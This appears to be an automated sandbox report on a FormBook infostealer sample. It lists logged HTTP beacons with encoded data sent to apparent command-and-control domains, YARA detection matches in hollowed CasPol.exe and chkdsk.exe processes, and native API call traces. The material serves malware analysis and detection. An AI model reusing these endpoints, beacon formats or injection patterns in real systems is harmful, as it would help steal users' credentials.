          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4 HTTP/1.1Host: www.specigain.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4 HTTP/1.1Host: www.gachthe365.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4 HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4 HTTP/1.1Host: www.krankenzusatz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4 HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4 HTTP/1.1Host: www.nativealternatives.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=lfF/IMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMqJ7XpqTWvQhSof1n765ctlTYzJmnMi2PgJXJ8R+QD+1thlnm9XNRA==&ryQDc=vwyb4 HTTP/1.1Host: www.heroclassicrally.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004038531_2_00403853
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004218211_2_00421821
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0042196F1_2_0042196F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004232201_2_00423220
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00421B681_2_00421B68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00401B301_2_00401B30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00422BF81_2_00422BF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004055AA1_2_004055AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004055B31_2_004055B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004206B31_2_004206B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040BF7E1_2_0040BF7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004057D31_2_004057D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040BF831_2_0040BF83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004017981_2_00401798
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00421F9F1_2_00421F9F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004017A01_2_004017A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D41201_2_013D4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BF9001_2_013BF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D99BF1_2_013D99BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA8301_2_013DA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014710021_2_01471002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148E8241_2_0148E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E20A01_2_013E20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014828EC1_2_014828EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CB0901_2_013CB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014820A81_2_014820A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0145CB4F1_2_0145CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DA3091_2_013DA309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01482B281_2_01482B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAB401_2_013DAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EEBB01_2_013EEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147DBD21_2_0147DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014703DA1_2_014703DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014623E31_2_014623E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E138B1_2_013E138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EABD81_2_013EABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB2361_2_013DB236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146FA2B1_2_0146FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474AEF1_2_01474AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014822AE1_2_014822AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B0D201_2_013B0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01481D551_2_01481D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01482D071_2_01482D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014825DD1_2_014825DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E25811_2_013E2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D821_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CD5E01_2_013CD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147D4661_2_0147D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C841F1_2_013C841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB4771_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014744961_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148DFCE1_2_0148DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01481FF11_2_01481FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D6E301_2_013D6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147D6161_2_0147D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01482EF71_2_01482EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05661D553_2_05661D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05662D073_2_05662D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05590D203_2_05590D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055AD5E03_2_055AD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056625DD3_2_056625DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C25813_2_055C2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D823_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565D4663_2_0565D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB4773_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A841F3_2_055A841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056544963_2_05654496
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05661FF13_2_05661FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0566DFCE3_2_0566DFCE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055B6E303_2_055B6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565D6163_2_0565D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05662EF73_2_05662EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0559F9003_2_0559F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055B41203_2_055B4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055B99BF3_2_055B99BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0566E8243_2_0566E824
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056510023_2_05651002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BA8303_2_055BA830
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056628EC3_2_056628EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055AB0903_2_055AB090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056620A83_2_056620A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C20A03_2_055C20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BAB403_2_055BAB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0563CB4F3_2_0563CB4F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05662B283_2_05662B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BA3093_2_055BA309
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CABD83_2_055CABD8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056423E33_2_056423E3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565DBD23_2_0565DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056503DA3_2_056503DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C138B3_2_055C138B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CEBB03_2_055CEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0564FA2B3_2_0564FA2B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB2363_2_055BB236
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05654AEF3_2_05654AEF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056622AE3_2_056622AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B28D703_2_00B28D70
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B238303_2_00B23830
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B238273_2_00B23827
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B2A1FB3_2_00B2A1FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3E9303_2_00B3E930
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3FA9E3_2_00B3FA9E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B21AD03_2_00B21AD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B4021C3_2_00B4021C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B2A2003_2_00B2A200
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B23A503_2_00B23A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3FBEC3_2_00B3FBEC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B3FDE53_2_00B3FDE5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_00B40E753_2_00B40E75
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 013BB150 appears 136 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0559B150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E5B3 NtCreateFile,1_2_0041E5B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E663 NtReadFile,1_2_0041E663
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E6E3 NtClose,1_2_0041E6E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E793 NtAllocateVirtualMemory,1_2_0041E793
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E65D NtReadFile,1_2_0041E65D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E6DE NtClose,1_2_0041E6DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E78D NtAllocateVirtualMemory,1_2_0041E78D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_013F9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,1_2_013F99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_013F9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,1_2_013F9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013F98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,1_2_013F9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_013F9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,1_2_013F9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,1_2_013F9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,1_2_013F95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_013F9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013F97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_013F9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9FE0 NtCreateMutant,LdrInitializeThunk,1_2_013F9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_013F9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013F96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9950 NtQueueApcThread,1_2_013F9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F99D0 NtCreateProcessEx,1_2_013F99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F9820 NtEnumerateKey,1_2_013F9820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013FB040 NtSuspendThread,1_2_013FB040
